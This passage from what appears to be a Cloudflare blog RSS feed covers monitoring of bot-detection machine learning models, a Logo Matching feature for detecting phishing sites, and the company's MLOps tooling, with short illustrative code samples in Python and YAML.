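        threshold=threshold,
        minutes=minutes,
    )

sql = render_monitoring_query(
    dataset_condition="heuristic_flag = 'bot'",  # high-confidence labels
    dimension="asn",
)
print(sql)
```

<p>Keeping the template fixed and only varying the conditions and time window is what preserves the apples-to-apples comparison described earlier.</p>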
    <div>
      <h3>Computing performance metrics</h3>
      <a href="#computing-performance-metrics">
        
      </a>
    </div>
    <p>With a rendered monitoring query ready, we can go ahead and fetch bot score distributions from our web request database. The <code>MetricsComputer</code> takes in the bot score distributions as input and produces relevant performance metrics, like accuracy, over a configurable time interval.</p><p>We can evaluate model performance along any metric of interest. The <code>MetricInterface</code> is a Python interface that acts as a blueprint for performance metrics. Any newly added metric would only need to implement the interface's <code>compute_metric</code> method, which defines how the <code>MetricsComputer</code> should perform the calculation.</p>
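<p>A minimal sketch of this pattern is below. Endeavour's actual interfaces aren't public, so the signatures here are assumptions; only the names <code>MetricInterface</code>, <code>compute_metric</code>, and <code>MetricsComputer</code> come from the description above, and the bot-score threshold is illustrative.</p>

```python
from abc import ABC, abstractmethod

class MetricInterface(ABC):
    """Blueprint for performance metrics (approximate shape)."""
    @abstractmethod
    def compute_metric(self, scores, labels):
        """Return a float metric given bot scores and ground-truth labels."""

class Accuracy(MetricInterface):
    def __init__(self, bot_threshold=30):  # illustrative threshold
        self.bot_threshold = bot_threshold

    def compute_metric(self, scores, labels):
        predictions = ["bot" if s <= self.bot_threshold else "human"
                       for s in scores]
        correct = sum(p == l for p, l in zip(predictions, labels))
        return correct / len(labels)

class MetricsComputer:
    """Runs every registered metric over a score distribution."""
    def __init__(self, metrics):
        self.metrics = metrics  # name -> MetricInterface instance

    def compute(self, scores, labels):
        return {name: m.compute_metric(scores, labels)
                for name, m in self.metrics.items()}

mc = MetricsComputer({"accuracy": Accuracy()})
print(mc.compute([5, 90, 80, 10], ["bot", "human", "bot", "bot"]))
# {'accuracy': 0.75}
```

<p>Adding a new metric means implementing one more <code>MetricInterface</code> subclass; the computer needs no changes.</p>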
    <div>
      <h3>Storing metrics</h3>
      <a href="#storing-metrics">
        
      </a>
    </div>
    <p>After each monitoring run, we store performance metrics by dataset, model version, and specialization value in the <code>ml_performance</code> ClickHouse table. Precomputing metrics enables long data retention periods, so we can review model performance by model versions or dimensions of interest over time. Importantly, newly added performance metrics can be backfilled as needed since the <code>ml_performance</code> table also stores the score distributions used to compute each metric.</p>
    <div>
      <h3>Running tasks on GPUs</h3>
      <a href="#running-tasks-on-gpus">
        
      </a>
    </div>
    <p>Metrics computation is load balanced across <code>endeavour-worker</code> instances running on GPUs. From a system perspective, the <a href="https://airflow.apache.org/docs/apache-airflow/stable/administration-and-deployment/scheduler.html"><code>airflow-scheduler</code></a> adds a monitoring task to a <a href="https://redis.com/glossary/redis-queue/">Redis Queue</a>, and <a href="https://airflow.apache.org/docs/apache-airflow/stable/core-concepts/executor/celery.html">Airflow Celery workers</a> running on each GPU pull tasks off the queue for processing. We benefit from having a production service constantly powered by GPUs, as opposed to only running ad hoc model training workloads. As a result, the monitoring service acts as a health check, ensuring various Endeavour components are functioning properly on GPUs. This helps ensure the GPUs are always updated and ready to run model training and validation tasks.</p>
    <div>
      <h2>Machine learning monitoring in action</h2>
      <a href="#machine-learning-monitoring-in-action">
        
      </a>
    </div>
    <p>To better illustrate how Cloudflare uses machine learning monitoring, let’s explore some recent examples.</p>
    <div>
      <h3>Improving accuracy of machine learning bot detection</h3>
      <a href="#improving-accuracy-of-machine-learning-bot-detection">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1mqzj2axLlpyV7dkdwX3Oo/47762be749130e966783c03bd3e3a274/Screenshot-2023-10-26-at-4.03.36-PM.png" />
            
            </figure><p>When the monitoring system was first deployed, we quickly found an anomaly: our model wasn’t performing well on web traffic using HTTP/3. At the time, HTTP/3 usage was still rare across the web, and the primary model in production wasn’t trained on HTTP/3 traffic, leading to inaccurate bot scores. Fortunately, another bot detection layer, our <a href="https://developers.cloudflare.com/bots/concepts/bot-score/#heuristics">heuristics engine</a>, was still accurately finding bots using HTTP/3 — so our customers were still covered.</p><p>Still, this finding pointed to a key area of improvement for the next model iteration. And we did improve: the next model iteration was consistently able to distinguish between bot- and human-initiated HTTP/3 web requests with over 3.5x higher accuracy compared to the prior model version. As we enable more datasets and specializations, we can uncover specific browsers, OSs, and other dimensions where performance can be improved during model training.</p>
    <div>
      <h3>Early detection, quick intervention</h3>
      <a href="#early-detection-quick-intervention">
        
      </a>
    </div>
    <p>Deploying machine learning at a global scale, running in data centers spread over 100 countries around the world, is challenging. Things don’t always go to plan.</p><p>A couple of years ago, we deployed an update to our machine learning powered bot detections, and it led to an increase in false positive bot detections — we were incorrectly flagging some legitimate traffic as bot traffic. Our monitoring system quickly showed a drop in performance on residential ASNs where we expect mostly non-automated traffic.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7Kv74hWqjzZHzbP175NLGy/761d8f84c577923bfe4d85c58f3f7dae/Screenshot-2023-10-26-at-9.52.45-AM.png" />
            
            </figure><p><i>In the graph above, deployments are shown to three colo “tiers”, 1-3. Since software deployments start on tier 3 colocation centers and gradually move up to tier 1, the impact followed the same pattern.</i></p><p>A software release was being deployed to our global network at the same time, but we didn’t yet know whether it was the cause of the performance drop. We do staged deployments, updating the software in one batch of data centers at a time before reaching global traffic. Our monitoring dashboards showed a drop in performance that followed this exact deployment pattern, and the release was about to reach our biggest data centers.</p><p>With the dashboards clearly tying the performance drop to the software update, we reverted the change before it reached most of our data centers and restored normal machine learning bot detection performance. Monitoring allows us to catch performance anomalies, dig into the root cause, and take action — fast.</p>
    <div>
      <h3>Model deployment monitoring for all</h3>
      <a href="#model-deployment-monitoring-for-all">
        
      </a>
    </div>
    <p>We’ve seen a lot of value in being able to monitor and control our models and deployments, and realized that other people must be running into the same challenges as well. Over the next few months, we'll be building out more advanced features for AI Gateway – our proxy that helps people observe and control their AI applications and models better. With AI Gateway, we can do all the same deployments, monitoring, and optimization strategies we have been doing for our Bot detection models in one unified control plane. We're excited to use these new features internally, but even more excited to release these features to the public, so that anyone is able to deploy, test, monitor and improve the way they use AI or machine learning models.</p>
    <div>
      <h3>Next up</h3>
      <a href="#next-up">
        
      </a>
    </div>
    <p>Today, machine learning monitoring helps us investigate performance issues and monitor performance as we roll out new models — and we're just getting started!</p><p>This year, we're accelerating our machine learning model iterations for bot detection to deliver improved detections faster than ever. Monitoring will be key to enabling fast and safe deployments. We’re excited to add alerting based on model performance, so that we’re automatically notified should it ever drift outside our expected bounds.</p><p>Alongside our <a href="/workers-ai/">Workers AI</a> launch, we recently deployed GPUs in 100+ cities, leveling up our compute resources at a global scale. This new infrastructure will accelerate our model iteration process, allowing us to explore new, cutting-edge models with even more powerful bot detection capabilities. Running models on our GPUs will bring inference closer to users for better model performance and latency, and we’re excited to leverage our new GPU compute with our bot detection models as well.</p> ]]></content:encoded>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">1fmWxxkv3k1hd25nsFmWtG</guid>
            <dc:creator>Daniel Means</dc:creator>
        </item>
        <item>
            <title><![CDATA[Safeguarding your brand identity: Logo Matching for Brand Protection]]></title>
            <link>https://blog.cloudflare.com/safeguarding-your-brand-identity-logo-matching-for-brand-protection/</link>
            <pubDate>Thu, 15 Feb 2024 14:00:34 GMT</pubDate>
            <description><![CDATA[ Brand Protection's Logo Matching feature enables users to upload an image of the user’s logo or other brand image. The system scans URLs to discover matching logos and then presents the results for users to review ]]></description>
            <content:encoded><![CDATA[ <p>In an era dominated by digital landscapes, protecting your brand’s identity has become more challenging than ever. Malicious actors regularly build lookalike websites, complete with official logos and <a href="https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/">spoofed domains</a>, to try to dupe customers and employees. These kinds of <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing attacks</a> can damage your reputation, erode customer trust, or even result in data breaches.</p><p>In March 2023 we introduced Cloudflare’s Brand and Phishing Protection suite, beginning with <a href="/50-most-impersonated-brands-protect-phishing/">Brand Domain Name Alerts</a>. This tool recognizes so-called “confusable” domains (which can be nearly indistinguishable from their authentic counterparts) by sifting through the trillions of DNS requests passing through Cloudflare’s DNS resolver, 1.1.1.1. This helps brands and organizations stay ahead of malicious actors by spotting suspicious domains as soon as they appear in the wild.</p><p>Today we are excited to expand our Brand Protection toolkit with the addition of Logo Matching. Logo Matching is a powerful tool that allows brands to detect unauthorized logo usage: if Cloudflare detects your logo on an unauthorized site, you receive an immediate notification.</p><p>The new Logo Matching feature is a direct result of a frequent request from our users. Phishing websites often use official brand logos as part of their facade. In fact, the appearance of unauthorized logos is a strong signal that a hitherto dormant suspicious domain is being weaponized. Identifying these sites before they are widely distributed is a powerful way to defend against phishing attacks. 
Organizations can use Cloudflare Gateway <a href="/2022-07-sms-phishing-attacks/">to block</a> employees from connecting to sites with a suspicious domain and unauthorized logo use.</p><p>Imagine having the power to fortify your brand's presence and reputation. By detecting instances where your logo is being exploited, you gain the upper hand in protecting your brand from potential fraud and phishing attacks.</p>
    <div>
      <h2>Getting started with Logo Matching</h2>
      <a href="#getting-started-with-logo-matching">
        
      </a>
    </div>
    <p>For most brands, the first step to leveraging Logo Matching will be to configure Domain Name Alerts. For example, we might decide to set up an alert for <i>example.com</i>, which will use fuzzy matching to detect lookalike, high-risk <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name/">domain names</a>. All sites that trigger an alert are automatically analyzed by Cloudflare’s phishing scanner, which gathers technical information about each site, including SSL certificate data, HTTP request and response data, page performance data, <a href="https://www.cloudflare.com/learning/dns/dns-records/">DNS records</a>, and more — all of which inform a machine-learning based phishing risk analysis.</p><p>Logo Matching further extends this scan by looking for matching images. The system leverages image recognition algorithms to crawl through scanned domains, identifying matches even when images have undergone slight modifications or alterations.</p><p>Once configured, Domain Name Alerts and the scans they trigger will continue on an ongoing basis. In addition, Logo Matching monitors for images across all domains scanned by Cloudflare’s phishing scanner, including those scanned by other Brand Protection users, as well as scans initiated via the Cloudflare Radar URL scanner, and the <a href="https://developers.cloudflare.com/security-center/investigate/investigate-threats/">Investigate Portal</a> within Cloudflare’s Security Center dashboard.</p>
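<p>As a toy illustration of how image matching can survive slight modifications, the snippet below implements a tiny average-hash comparison: each pixel is reduced to one bit (above or below the image's mean brightness), and two images are compared by Hamming distance. This is a generic perceptual-hashing example, not the algorithm behind Logo Matching.</p>

```python
# Toy perceptual hash over raw grayscale grids; real systems first
# resize images to a fixed small grid (e.g. 8x8) before hashing.

def average_hash(pixels):
    """pixels: 2D list of grayscale values; returns a list of bits."""
    flat = [v for row in pixels for v in row]
    mean = sum(flat) / len(flat)
    return [1 if v > mean else 0 for v in flat]

def hamming(a, b):
    """Number of differing bits; small distance = likely match."""
    return sum(x != y for x, y in zip(a, b))

logo = [[200, 10], [10, 200]]
tweaked = [[190, 20], [15, 205]]   # slightly altered copy
unrelated = [[200, 200], [10, 10]]

print(hamming(average_hash(logo), average_hash(tweaked)))    # 0
print(hamming(average_hash(logo), average_hash(unrelated)))  # 2
```

<p>Because each bit only records whether a pixel is brighter than the image's own average, small edits to brightness or compression artifacts leave the hash unchanged, while a structurally different image diverges.</p>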
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Ho5Hl0b6xXd8TCObhVqnb/af1d3a4784b87fb16d531e636e0e9999/image4-6.png" />
            
            </figure>
    <div>
      <h2>How we built Logo Matching for Brand Protection</h2>
      <a href="#how-we-built-logo-matching-for-brand-protection">
        
      </a>
    </div>
    
    <div>
      <h3>Under the hood of our API Insights</h3>
      <a href="#under-the-hood-of-our-api-insights">
        
      </a>
    </div>
    <p>Now, let's dive deeper into the engine powering this feature – our Brand Protection API. This API serves as the backbone of the entire process. Not only does it enable users to submit logos and brand images for scanning, but it also orchestrates the complex matching process.</p><p>When a logo is submitted through the API, the Logo Matching feature not only identifies potential matches but also allows customers to save a query, providing an easy way to refer back to their queries and see the most recent results. If a customer chooses to save a query, the logo is swiftly added to our data storage in <a href="https://www.cloudflare.com/developer-platform/products/r2/">R2</a>, Cloudflare’s zero egress fee <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>. This foundational feature enables us to continuously provide updated results without the customer having to create a new query for the same logo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/48G6eXrF2XewJpjrlzbBdU/f327a4245d033aeebf6122095af8d92e/image2-11.png" />
            
            </figure><p>The API ensures real-time responses for logo submissions, simultaneously kick-starting our internal scanning pipelines. An image look-back ID is generated to facilitate seamless tracking and processing of logo submissions. This identifier allows us to keep a record of the submitted images, ensuring that we can efficiently manage and process them through our system.</p>
    <div>
      <h3>Scan result retrieval</h3>
      <a href="#scan-result-retrieval">
        
      </a>
    </div>
    <p>As images undergo scanning, the API remains the conduit for result retrieval. Its role here is to constantly monitor and provide the results in real time. During scanning, the API ensures users receive timely updates. If scanning is still in progress, a “still scanning” status is communicated. Upon completion, the API is designed to relay crucial information — details on matches if found, or a simple “no matches” declaration.</p>
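<p>From a client's point of view, the retrieval flow described above can be sketched as a simple polling loop. The statuses and the <code>fetch_status</code> function here are hypothetical stand-ins, not the real Brand Protection API.</p>

```python
import time

def poll_scan(fetch_status, interval=0.0, max_attempts=10):
    """fetch_status() returns a dict like {'status': 'scanning'} or
    {'status': 'complete', 'matches': [...]} (hypothetical shape)."""
    for _ in range(max_attempts):
        result = fetch_status()
        if result["status"] == "complete":
            # Either a list of matched URLs, or [] for "no matches".
            return result.get("matches", [])
        time.sleep(interval)  # still scanning; try again later
    raise TimeoutError("scan did not complete in time")

# Simulated API: two "still scanning" responses, then a match.
responses = iter([
    {"status": "scanning"},
    {"status": "scanning"},
    {"status": "complete", "matches": ["examp1e-login.com"]},
])
print(poll_scan(lambda: next(responses)))  # ['examp1e-login.com']
```
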
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1FWft91GuiGRvUk3ZtxmxH/36e8fb3bf0c1b0a0f3c8af5005c572a0/image1-12.png" />
            
            </figure>
    <div>
      <h3>Storing and maintaining logo data</h3>
      <a href="#storing-and-maintaining-logo-data">
        
      </a>
    </div>
    <p>In the background, we maintain a vectorized version of all user-uploaded logos when the user query is saved. This system, acting as a logo matching subscriber, is responsible for ensuring accurate and up-to-date logo matching.</p><p>To accomplish this, two strategies come into play. First, the subscriber stays attuned to revisions in the logo set: it saves vectorized logo sets with every revision, and regular checks are conducted to ensure alignment between the vectorized logos and those saved in the database.</p><p>Second, while monitoring the query, the subscriber employs a diff-based strategy. This recalibrates the vectorized logo set against the current logos stored in the database, ensuring a seamless transition into processing.</p>
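<p>A minimal sketch of such a diff-based reconciliation is below: compare the logos saved in the database with the vectorized set, and only (re)vectorize or drop what changed. The <code>vectorize</code> step is a placeholder, not a real embedding model.</p>

```python
def vectorize(logo_bytes):
    return [float(b) for b in logo_bytes]  # placeholder embedding

def sync_vectorized_logos(db_logos, vectorized):
    """db_logos: dict logo_id -> bytes (source of truth).
    vectorized: dict logo_id -> vector (cache to reconcile).
    Returns (added, removed) logo IDs for observability."""
    added = db_logos.keys() - vectorized.keys()
    removed = vectorized.keys() - db_logos.keys()
    for logo_id in added:
        vectorized[logo_id] = vectorize(db_logos[logo_id])
    for logo_id in removed:
        del vectorized[logo_id]  # logo deleted from the saved query
    return sorted(added), sorted(removed)

db = {"logo-a": b"\x01\x02", "logo-b": b"\x03"}
cache = {"logo-b": [3.0], "logo-stale": [9.0]}
print(sync_vectorized_logos(db, cache))  # (['logo-a'], ['logo-stale'])
print(sorted(cache))                     # ['logo-a', 'logo-b']
```

<p>Diffing keeps the reconciliation cheap: unchanged logos are never re-vectorized, so only the delta between revisions costs compute.</p>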
    <div>
      <h2>Shaping the future of brand protection: our roadmap ahead</h2>
      <a href="#shaping-the-future-of-brand-protection-our-roadmap-ahead">
        
      </a>
    </div>
    <p>With the introduction of the Logo Matching feature, Cloudflare’s Brand Protection suite advances to the next level of brand integrity management. By enabling you to detect, analyze, and act on unauthorized logo usage, we’re helping businesses take better care of their brand identity.</p><p>At Cloudflare, we're committed to shaping a comprehensive brand protection solution that anticipates and mitigates risks proactively. In the future, we plan to enhance our brand protection solution with features like automated cease and desist letters for swift legal action against unauthorized logo use, proactive domain monitoring upon onboarding, simplified reporting of brand impersonations, and more.</p>
    <div>
      <h2>Getting started</h2>
      <a href="#getting-started">
        
      </a>
    </div>
    <p>If you’re an Enterprise customer, <a href="https://www.cloudflare.com/lp/brandprotection/">sign up for Beta Access</a> for Brand Protection now to gain access to private scanning for your domains, logo matching, saved queries, and alerts on matched domains. Learn more about Brand Protection <a href="https://developers.cloudflare.com/security-center/brand-protection/">here</a>.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Brand Protection]]></category>
            <category><![CDATA[Brand]]></category>
            <category><![CDATA[Fraud]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Image Recognition]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">5yEDWpQ6C6r0cHoEee3Y6O</guid>
            <dc:creator>Alexandra Moraru</dc:creator>
        </item>
        <item>
            <title><![CDATA[A look inside the Cloudflare ML Ops platform]]></title>
            <link>https://blog.cloudflare.com/mlops/</link>
            <pubDate>Thu, 07 Dec 2023 14:00:42 GMT</pubDate>
            <description><![CDATA[ To help our team continue to innovate efficiently, our MLOps effort has collaborated with Cloudflare’s data scientists to implement the following best practices ]]></description>
            <content:encoded><![CDATA[
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4GvjtY1dTv1z9QsDBcP5q9/9430817e4123b426b6e26b1ef02d361a/image1.png" />
            
            </figure><p>We've been relying on ML and AI for our core services like Web Application Firewall (WAF) since the early days of Cloudflare. Through this journey, we've learned many lessons about running AI deployments at scale, and all the tooling and processes necessary. We recently launched <a href="/workers-ai/">Workers AI</a> to help abstract a lot of that away for inference, giving developers an easy way to leverage powerful models with just a few lines of code. In this post, we’re going to explore some of the lessons we’ve learned on the other side of the ML equation: <i>training</i>.</p><p>Cloudflare has extensive experience training models and using them to improve our products. A constantly-evolving ML model drives the <a href="/data-generation-and-sampling-strategies/">WAF attack score</a> that helps protect our customers from malicious payloads. Another evolving model powers our <a href="/stop-the-bots-practical-lessons-in-machine-learning/">bot management</a> product to catch and <a href="/cloudflare-bot-management-machine-learning-and-more/">prevent bot attacks</a> on our <a href="/machine-learning-mobile-traffic-bots/">customers</a>. Our customer support is <a href="/using-data-science-and-machine-learning-for-improved-customer-support/">augmented by data science</a>. We build machine learning to <a href="/threat-detection-machine-learning-models/">identify threats</a> with our global network. To top it all off, Cloudflare is delivering <a href="/scalable-machine-learning-at-cloudflare/">machine learning at unprecedented scale</a> across our network.</p><p>Each of these products, along with many others, has elevated ML models — including experimentation, training, and deployment — to a crucial position within Cloudflare. To help our team continue to innovate efficiently, our MLOps effort has collaborated with Cloudflare’s data scientists to implement the following best practices.</p>
    <div>
      <h3>Notebooks</h3>
      <a href="#notebooks">
        
      </a>
    </div>
    <p>Given a use case and data, the first step for many Data Scientists and AI Scientists is to set up an environment for exploring data, feature engineering, and model experiments. <a href="https://docs.jupyter.org/en/latest/start/index.html">Jupyter Notebooks</a> are a common tool to satisfy these requirements. These environments provide an easy remote Python environment that can be run in the browser or connected to a local code editor. To make notebooks scalable and open to collaboration, we deploy <a href="https://jupyter.org/hub">JupyterHub</a> on Kubernetes. With JupyterHub, we can manage resources for teams of Data Scientists and ensure they get a suitable development environment. Each team can tailor their environment by pre-installing libraries and configuring user environments to meet team-specific needs, or even those of individual projects.</p><p>This notebook space is always evolving as well. Open source projects include further features, such as:</p><ul><li><p><a href="https://nbdev.fast.ai/">nbdev</a> - a Python package to improve the notebook experience</p></li><li><p><a href="https://www.kubeflow.org/docs/components/notebooks/overview/">Kubeflow</a> - the Kubernetes-native CNCF project for machine learning</p></li><li><p><a href="https://www.deploykf.org/">deployKF</a> - ML Platforms on any Kubernetes cluster, with centralized configs, in-place upgrades, and support for leading ML &amp; Data tools like Kubeflow, Airflow, and MLflow</p></li></ul>
    <div>
      <h3>GitOps</h3>
      <a href="#gitops">
        
      </a>
    </div>
    <p>Our goal is to provide an easy-to-use platform for Data Scientists and AI Scientists to develop and test machine learning models quickly. Hence, we are adopting GitOps as our continuous delivery and infrastructure management strategy on the MLOps Platform at Cloudflare. GitOps is a software development methodology that leverages Git, a distributed version control system, as the single source of truth for defining and managing infrastructure, application configurations, and deployment processes. It aims to automate and streamline the deployment and management of applications and infrastructure in a declarative and auditable manner. GitOps aligns well with the principles of automation and collaboration, which are crucial for <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning (ML)</a> workflows.</p><p>A data scientist needs to define the desired state of infrastructure and applications. This usually takes a lot of custom work, but with <a href="https://argo-cd.readthedocs.io/en/stable/">ArgoCD</a> and model templates, all it takes is a simple pull request to add new applications. Helm charts and Kustomize are both supported to allow for configuration for different environments and jobs. With ArgoCD, declarative GitOps will then start the Continuous Delivery process. ArgoCD will continuously check the desired state of the infrastructure and applications to ensure that they are synced with the Git repository.</p>
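<p>For illustration, a GitOps deployment of a model application might be declared with an ArgoCD <code>Application</code> manifest along these lines. The repository URL, paths, and names are placeholders, not Cloudflare's actual configuration.</p>

```yaml
# Hypothetical ArgoCD Application: ArgoCD watches the Git repo and
# keeps the cluster in sync with the manifests found at 'path'.
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: fraud-model-batch-inference   # example model application
  namespace: argocd
spec:
  project: ml-platform
  source:
    repoURL: https://git.example.com/ml/deployments.git
    targetRevision: main
    path: models/fraud-model/overlays/production   # Kustomize overlay
  destination:
    server: https://kubernetes.default.svc
    namespace: ml-models
  syncPolicy:
    automated:
      prune: true      # remove resources deleted from Git
      selfHeal: true   # revert manual drift back to the Git state
```

<p>With <code>automated</code> sync, merging a pull request is the deployment: ArgoCD detects the new commit and reconciles the cluster, with no manual apply step.</p>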
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/46I2rJ6bnhsXmVC8f7sK3i/7b47bc18341611aad94ebbb81cb30be3/image2.png" />
            
            </figure><p>In the future, we plan to migrate our platform (including Jupyterhub) to <a href="https://www.kubeflow.org/">Kubeflow</a>, a machine learning workflow platform on Kubernetes that simplifies the development, deployment, and management of notebooks and end-to-end pipelines. This is best deployed using a new project, <a href="https://www.deploykf.org/">deployKF</a>, which allows for distributed configuration management across multiple components available with Kubeflow, and others that extend beyond what is offered within Kubeflow.</p>
    <div>
      <h3>Templates</h3>
      <a href="#templates">
        
      </a>
    </div>
    <p>Starting a project with the right tools and structure can be the difference between success and stagnation. Within Cloudflare, we've curated an array of model templates, which are production-ready data science repositories with an example model. These model templates are themselves deployed through production to continually ensure they remain a stable foundation for future projects. To start a new project, all it takes is one Makefile command to build a new CI/CD project in the Git repository of the user's choosing. The template utility packages are identical to those used in our Jupyter Notebooks, with connections to R2 / S3 / GCS buckets and D1 / Postgres / BigQuery / ClickHouse databases. Data scientists can use these templates to instantly kickstart new projects with confidence. These templates are not yet publicly available, but our team plans to open source them in the future.</p><p><b>1. Training Template</b> Our model training template provides a solid foundation to build any model. It is configured to help extract, transform, and load data (ETL) from any data source. The template includes helper functions for feature engineering, tracking experiments with model metadata, and productionizing the model pipeline as a Directed Acyclic Graph (DAG). Each orchestration can be configured to use <a href="https://github.com/airflow-helm/charts">Airflow</a> or <a href="https://argoproj.github.io/argo-workflows/">Argo Workflows</a>.</p><p><b>2. Batch Inference Template</b> Batch and micro-batch inference can make a significant impact on processing efficiency. Our batch inference template schedules models for consistent results, and can be configured to use <a href="https://github.com/airflow-helm/charts">Airflow</a> or <a href="https://argoproj.github.io/argo-workflows/">Argo Workflows</a>.</p><p><b>3. Stream Inference Template</b> This template makes it easy for our team to deploy real-time inference. Tailored for Kubernetes as a microservice using <a href="https://fastapi.tiangolo.com/">FastAPI</a>, this template allows our team to run inference using familiar Python in a container. The microservice has built-in interactive REST documentation with <a href="https://swagger.io/">Swagger</a> and integration with Cloudflare Access authentication tokens in <a href="https://developers.cloudflare.com/cloudflare-one/api-terraform/access-with-terraform/">Terraform</a>.</p><p><b>4. Explainability Template</b> Our model template for explainability spins up dashboards to illuminate the model type and experiments. It is important to be able to understand key values such as the F1 score over a time window and the drift of features and data over time. Tools like <a href="https://streamlit.io/">Streamlit</a> and <a href="https://bokeh.org/">Bokeh</a> help make this possible.</p>
    <div>
      <h3>Orchestration</h3>
      <a href="#orchestration">
        
      </a>
    </div>
    <p>Organizing data science into a consistent pipeline involves a lot of data and several model versions. Enter Directed Acyclic Graphs (DAGs), a robust flow chart orchestration paradigm that weaves together the steps from data to model, and model to inference. There are many approaches to running DAG pipelines, but we have found that data science teams' preference comes first: each team has different approaches based on their use cases and experience.</p><p><a href="https://github.com/airflow-helm/charts"><b>Apache Airflow</b></a> <b>- The Standard DAG Composer</b> Apache Airflow is the standard for DAG-based orchestration. With a vast community and extensive plugin support, <a href="/automating-data-center-expansions-with-airflow/">Airflow excels in handling diverse workflows</a>. The flexibility to integrate with a multitude of systems and a web-based UI for task monitoring make it a popular choice for orchestrating complex sequences of tasks. Airflow can be used to run any data or machine learning workflow.</p><p><a href="https://argoproj.github.io/argo-workflows/"><b>Argo Workflows</b></a> <b>- Kubernetes-native Brilliance</b> Built for Kubernetes, Argo Workflows embraces the container ecosystem for orchestrating workflows. It boasts an intuitive YAML-based workflow definition and excels in running microservices-based workflows. The integration with Kubernetes enables scalability, reliability, and native container support, making it an excellent fit for organizations deeply rooted in the Kubernetes ecosystem. Argo Workflows can also be used to run any data or machine learning workflow.</p><p><a href="https://www.kubeflow.org/docs/components/pipelines/v2/introduction/"><b>Kubeflow Pipelines</b></a> <b>- A Platform for Workflows</b> Kubeflow Pipelines (“KFP”) is tailored specifically for orchestrating machine learning workflows, addressing the unique demands of data preparation, model training, and deployment. As an integrated component of the Kubeflow ecosystem, it streamlines ML workflows with a focus on collaboration, reusability, and versioning. Its compatibility with Kubernetes ensures seamless integration and efficient orchestration.</p><p><a href="https://temporal.io/"><b>Temporal</b></a> <b>- The Stateful Workflow Enabler</b> Temporal emphasizes the orchestration of long-running, stateful workflows. This relative newcomer shines in managing resilient, event-driven applications, preserving workflow state and enabling efficient recovery from failures. Its unique selling point is providing a durable, fault-tolerant orchestration solution for complex, stateful workflows.</p><p>In the orchestration landscape, the choice ultimately comes down to the team and the use case. All of these are open source projects, so the main investment is supporting teams' different styles of work, and we find that investment worthwhile.</p>
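    <p>To make the DAG execution model concrete, here is a minimal, framework-agnostic sketch in plain Python (not Airflow or Argo; the pipeline step names are hypothetical) of how an orchestrator derives a valid run order from a pipeline's dependency graph:</p>

```python
from collections import deque

def execution_order(dag):
    """Return a valid run order for a DAG given as {step: [upstream steps]}."""
    indegree = {step: len(deps) for step, deps in dag.items()}
    downstream = {step: [] for step in dag}
    for step, deps in dag.items():
        for dep in deps:
            downstream[dep].append(step)
    # Kahn's algorithm: repeatedly run whichever steps have no pending deps.
    ready = deque(sorted(step for step, d in indegree.items() if d == 0))
    order = []
    while ready:
        step = ready.popleft()
        order.append(step)
        for nxt in downstream[step]:
            indegree[nxt] -= 1
            if indegree[nxt] == 0:
                ready.append(nxt)
    if len(order) != len(dag):
        raise ValueError("cycle detected: not a DAG")
    return order

# A hypothetical ML pipeline: data to features to model to inference.
pipeline = {
    "extract": [],
    "features": ["extract"],
    "train": ["features"],
    "evaluate": ["train"],
    "deploy": ["evaluate"],
}
print(execution_order(pipeline))  # ['extract', 'features', 'train', 'evaluate', 'deploy']
```

    <p>Airflow, Argo Workflows, Kubeflow Pipelines, and Temporal all layer scheduling, retries, and distributed execution on top of exactly this kind of dependency resolution.</p>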
    <div>
      <h3>Hardware</h3>
      <a href="#hardware">
        
      </a>
    </div>
    <p>Achieving optimal performance necessitates an understanding of workloads and the underlying use cases in order to provide teams with <a href="/cloudflares-gen-x-servers-for-an-accelerated-future/">effective hardware</a>. The goal is to strike a balance between enabling data scientists and keeping hardware well utilized. Each workload is different, and it is important to fine-tune each use case for the capabilities of <a href="/bringing-ai-to-the-edge/">GPUs</a> and <a href="/debugging-hardware-performance-on-gen-x-servers/">CPUs</a> to find the perfect tool for the job. For core datacenter workloads and edge inference, GPUs have leveled up the speed and efficiency that are core to our business. With <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability</a> metrics consumed by <a href="https://prometheus.io/">Prometheus</a>, we can tune orchestration for <a href="/getting-to-the-core/">performance</a>, maximize hardware utilization, and operate within a Kubernetes-native experience.</p>
    <div>
      <h3>Adoption</h3>
      <a href="#adoption">
        
      </a>
    </div>
    <p>Adoption is often one of the most challenging steps in the MLops journey. Before jumping into building, it is important to understand the different teams and their approach to data science. At Cloudflare, this process began years ago, when each of the teams started their own machine learning solutions separately. As these solutions evolved, we ran into the common challenge of working across the company to prevent work from becoming isolated from other teams. In addition, there were other teams that had potential for machine learning but did not have data science expertise within their team. This presented an opportunity for MLops to step in — both to help streamline and standardize the ML processes being employed by each team, and to introduce potential new projects to data science teams to start the ideation and discovery process.</p><p>When able, we have found the most success when we can help get projects started and shape the pipelines for success. Providing components for shared use such as notebooks, orchestration, data versioning (DVC), feature engineering (Feast), and model versioning (MLflow) allow for teams to collaborate directly.</p>
    <div>
      <h3>Looking forward</h3>
      <a href="#looking-forward">
        
      </a>
    </div>
